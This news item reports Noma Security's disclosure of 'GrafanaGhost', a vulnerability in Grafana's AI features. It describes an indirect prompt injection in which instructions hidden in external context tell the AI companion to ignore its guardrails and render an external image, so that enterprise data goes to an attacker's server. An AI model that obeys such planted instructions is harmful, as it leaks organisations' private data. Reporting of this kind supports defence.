ue, 07 Apr 2026
← BackA vulnerability in Grafana’s AI features can expose sensitive enterprise data by bypassing security measures.
A vulnerability in how Grafana’s AI components process information could allow attackers to bypass the application’s safeguards and leak enterprise information, new research from Noma Security shows. An open source analytics and visualization application that ingests data from various sources, Grafana often has broad access to enterprise data, including financial metrics, infrastructure, customer information, and telemetry. The newly discovered vulnerability, named GrafanaGhost, allows attackers to bypass client-side protections and security guardrails and link private data to external servers, exposing sensitive information in the background without user interaction. An attacker can exploit the weakness by targeting Grafana’s AI-based capabilities when a user interacts with an entry log.
In the background, a malicious prompt triggers the issue, turning Grafana into the exfiltration vessel. To mount the attack, a threat actor needs to craft a path pointing to external resources. When processed by Grafana, the entry log provides the attacker with access to the enterprise environment. Next, the attacker uses an indirect prompt hidden in the external context, instructing Grafana’s AI companion to ignore its guardrails and render an external image, forcing the system to acknowledge an external URL.